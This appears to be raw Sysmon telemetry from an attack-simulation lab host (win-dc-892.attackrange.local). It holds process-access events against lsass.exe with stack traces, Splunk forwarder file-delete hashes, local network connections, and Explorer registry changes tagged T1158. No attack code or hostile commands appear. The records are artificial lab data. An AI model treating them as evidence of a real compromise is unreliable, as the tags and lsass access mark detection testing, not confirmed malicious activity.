12:03:11.732{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:11.732{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:11.732{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:11.732{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000008735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.366{266CAFBE-64FC-6064-1001-00000000AE01}6660win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe 10341000x80000000000000008734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:11.077{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-64FE-6064-1201-00000000AE01}3352C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:11.077{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64FE-6064-1201-00000000AE01}3352C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:11.062{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D325BE328530BD7A74BE6E024DF03D1C,SHA256=25CF2183089260FB79523E004F0307BFC0B17ECF4634C442FF2F8C818473E38E,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000008741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:12.216{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{939D20AC-8036-406F-BD5C-BF672896BD71} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFFBinary Data 23542300x80000000000000008740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:12.107{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4D3CC5915122E8B9184FB93F55EA2A4,SHA256=C2F2EB880A09739F4D2190B40351A59A78F0AEB144F40271046B8700DA51165C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:13.338{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1F441150507115D5AD845AAC7072A165,SHA256=4CDFCB961C36D7B2644AE6E99E14DAFA581CED125C900112FAAA09E8519ED3A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:13.104{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B0B91E55D9FD59AFC4547EFBBC92A92,SHA256=A40EE62C54658FC4FA03DB5B99EBC85CD1F3B58DF8C2AF2F15FEC20A8245DD04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:14.165{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30C065C84A0C831ED0688DB2C2B56CA3,SHA256=BD78C6265DC859578AF64BCD82764A3A8B5F42FA2CFAE8C6126D50DDFF5EE42C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000008750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:03:15.755{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHiddenDWORD (0x00000000) 13241300x80000000000000008749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:03:15.755{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExtDWORD (0x00000001) 13241300x80000000000000008748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:03:15.755{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HiddenDWORD (0x00000002) 23542300x80000000000000008747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:15.287{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48041AEA27714D43586BB9537D96C063,SHA256=545556BBC851E2FC1B8AD626B8EF9C378F945E1A0CBB0CD2435A21551C1C2709,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:15.287{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=579D4C7BB406F5F46202E70D0F4966D2,SHA256=87E8A79A668765935BFCDB52489D772C4818EF60C527E5FFAFDCC28C7AA2ADD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:15.194{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAE69754CEDF49B3F003357A5F663C3B,SHA256=63F11A4871CD966FDF6DC3CF667A24D50E0753FF64648F305A82303073E13357,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:16.238{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB6A9EE217F58B220DE3E3C731809BAC,SHA256=D2FAC98FF68AD7B32919BDA9F2407E242AF2CCA7E471978620A14D4CA18AAB50,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:14.464{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53607-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000008751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:14.464{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53607-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x80000000000000008755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:17.361{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB320F9734CA32827626E52FD42111A5,SHA256=F897F17669F166B3CD6D7FE5392FD0B98E54EB13AC6AF0B69BC20AB45A86953E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:15.339{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53608-false10.0.1.12-8000- 13241300x80000000000000008758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:03:18.375{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExtDWORD (0x00000000) 13241300x80000000000000008757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:03:18.375{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HiddenDWORD (0x00000001) 23542300x80000000000000008756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:18.375{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AC75A6D146B03C036E7DB8DD4A84E65,SHA256=DF241B2F474EAEE925F0E3EC5BE75B4A8246637BB86941F1C3B7953D29406520,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000008761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:19.638{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{99D353BC-C813-41EC-8F28-EAE61E702E57} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFFBinary Data 13241300x80000000000000008760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:19.638{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFFBinary Data 23542300x80000000000000008759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:19.388{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E769AA4CD6E4EC90B906E3E1820CF3E,SHA256=4977C9C410D670DE5781F3FD0F15A4C924C9E8D79B31B9E9331D8B0CDED2BD20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:20.402{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1057AA5CC2AB896AECA6B6B3F218FE0,SHA256=E0B47AC55523335B67CC3DBB128DE21AA961CDE44760910E11584DF776D8847C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:21.416{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBD77FFCA16D1A5BFA3BF976A44E7FE9,SHA256=F27C89092B5A7AF96CCDD3C0BEFCBF241D829986299AFB73CE058F90CF27F956,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:22.476{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62E0F27F5D0883E47245B9E5D080D798,SHA256=55D480D53B1F67875433A7F975E8AD3428743BA51C22B8E7B3A70CEF1E144EE1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000008764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:22.039{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEC:\Temp\New Text Document.txt2021-03-31 12:03:22.039 23542300x80000000000000008767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:23.505{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C60D9C027C4CC9E21FA35C155E59F079,SHA256=1DB4B0E9EF677B71BB757AF027AF6DC68133F087D0EA9DF4FF13E13276B71E0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:21.292{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53609-false10.0.1.12-8000- 10341000x80000000000000008779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.815{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.815{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.581{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000008775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.519{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DD94CC66B87E9354B270AACCDC2B51E,SHA256=850AAACEE531BD0AF41A62D395B49CBB4D6BC5674A98B52F6B7240325D5017F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.488{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.488{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.488{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.488{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 